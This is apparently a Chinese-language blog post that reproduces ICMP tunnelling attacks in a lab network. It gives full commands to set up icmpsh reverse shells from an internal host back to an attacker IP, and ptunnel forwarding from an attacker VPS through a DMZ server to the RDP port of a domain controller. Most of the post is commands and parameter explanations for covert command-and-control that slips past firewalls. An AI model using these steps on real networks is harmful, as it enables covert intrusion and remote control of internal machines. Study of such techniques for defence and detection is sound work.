內網-隱藏隧道通訊技術,場景復現(ICMP隧道)

最美安聯發表於2020-10-21

隱藏隧道通訊技術(ICMP隧道)

一 icmpsh(跨平臺)
環境:
外網攻擊測試機,內網主機
下載工具:
git clonehttps://github.com/inquisb/icmpsh.git
安裝依賴包:
apt-get install python-impacket
修改icmp通訊方法:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
外網攻擊測試機:
./icmpsh_m.py ip(攻擊) ip(目標) //等待反彈shell
內網主機:
icmpsh.exe -t i p(攻擊) -d 500 -b 30 -s 128

二 pingtunnel(跨平臺,可設定密碼)
2.1 實驗環境
軟體防火牆:
VM配置:雙網路卡:橋接+僅主機
monowall 10.1.1.1/192.168.1.10
公網vps:
VM配置:橋接
kali2020 192.168.1.13
攻擊者PC:
VM配置:橋接
windows7 192.168.1.2
DMZ區伺服器:
VM配置:雙網路卡 僅主機+橋接
kali2020 192.168.1.4/10.1.1.5
內網PC:
VM配置:僅主機
windows2012 10.1.1.2(DC)
2.2 簡單拓撲
在這裡插入圖片描述

2.3 功能實現
通過ICMP協議,使攻擊者能直接控制內網PC
2.4 過程復現
A vps和dmz區伺服器安裝pingtunnel工具
1.下載https://github.com/lnslbrty/ptunnel-ng
2.安裝編譯
tar xf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install
可能遇到的錯誤
缺少pcap.h
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
yacc包錯誤
Sudo apt-get install –y byacc
./configure
make
sudo make install
B 在dmz區伺服器開啟監聽
ptunnel -x shuteer //-x shuteer 設定密碼為shuteer

在這裡插入圖片描述
C 在vps開啟監聽
ptunnel -p 192.168.1.4 -lp 1080 -da 10.1.1.2 -dp 3389 -x shuteer //在vps本地的1080埠監聽dmz區伺服器icmp的流量,並轉發到內網主機的3389埠
在這裡插入圖片描述

引數說明:
-x 指定 icmp 隧道連線驗證密碼
-lp 指定要監聽的本地 tcp 埠
-da 指定要轉發到的機器的 ip 地址
-dp 指定要轉發到的機器的 tcp 埠
-p 指定icmp隧道另一端機器的 ip 地址
D 在攻擊者PC
連線vps伺服器的1080埠,並登入:
在這裡插入圖片描述

相關文章